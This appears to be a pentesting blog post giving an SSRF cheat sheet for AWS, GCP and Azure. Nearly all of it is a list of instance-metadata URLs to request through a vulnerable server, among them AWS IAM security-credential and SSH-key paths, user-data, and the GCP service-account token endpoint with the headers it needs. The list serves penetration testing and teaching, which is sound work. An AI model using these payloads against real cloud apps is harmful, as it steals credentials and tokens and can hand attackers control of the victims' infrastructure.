Learn Pentesting like a Pro!

Share this post

Learn Pentesting like a Pro!
Learn Pentesting like a Pro!
SSRF cheat sheet for AWS, GCP and Azure
Copy link
Facebook
Email
Notes
More

SSRF cheat sheet for AWS, GCP and Azure

DH
Feb 06, 2023

Share this post

Learn Pentesting like a Pro!
Learn Pentesting like a Pro!
SSRF cheat sheet for AWS, GCP and Azure
Copy link
Facebook
Email
Notes
More
Share

In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. The attacker can supply or modify a URL which the code running on the server will read or submit data to, and by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like http enabled databases or perform post requests towards internal services which are not intended to be exposed.

Source: https://owasp.org/www-community/attacks/Server_Side_Request_Forgery

green and white electric device
Photo by Kirill Sh on Unsplash

If a cloud app is vulnerable to SSRF you can read valuable infrastructure info, below the most useful URLs sorted by provider:

AWS

  • http://169.254.169.254/latest/user-data

  • http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]

  • http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]

  • http://169.254.169.254/latest/meta-data/ami-id

  • http://169.254.169.254/latest/meta-data/reservation-id

  • http://169.254.169.254/latest/meta-data/hostname

  • http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

  • http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key

  • http://169.254.169.254/latest/meta-data/

  • http://169.254.169.254/latest/meta-data/public-keys/

GCP

NOTE: Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True”

  • http://169.254.169.254/computeMetadata/v1/

  • http://metadata.google.internal/computeMetadata/v1/

  • http://metadata/computeMetadata/v1/

  • http://metadata.google.internal/computeMetadata/v1/instance/id

  • http://metadata.google.internal/computeMetadata/v1/instance/region

  • http://metadata.google.internal/computeMetadata/v1/instance/zone

  • http://metadata.google.internal/computeMetadata/v1/project/project-id

  • http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

  • http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/

  • http://metadata.google.internal/computeMetadata/v1beta1/

Azure

  • http://169.254.169.254/metadata/v1/maintenance

Blind SSRF reference: https://github.com/assetnote/blind-ssrf-chains

Thanks for reading Learn Pentesting like a Pro! Subscribe for free to receive new posts.

Share this post

Learn Pentesting like a Pro!
Learn Pentesting like a Pro!
SSRF cheat sheet for AWS, GCP and Azure
Copy link
Facebook
Email
Notes
More
Share

Discussion about this post

No posts

Ready for more?

© 2024 pentesting.academy
Privacy ∙ Terms ∙ Collection notice
Start WritingGet the app
Substack is the home for great culture

Share

Copy link
Facebook
Email
Notes
More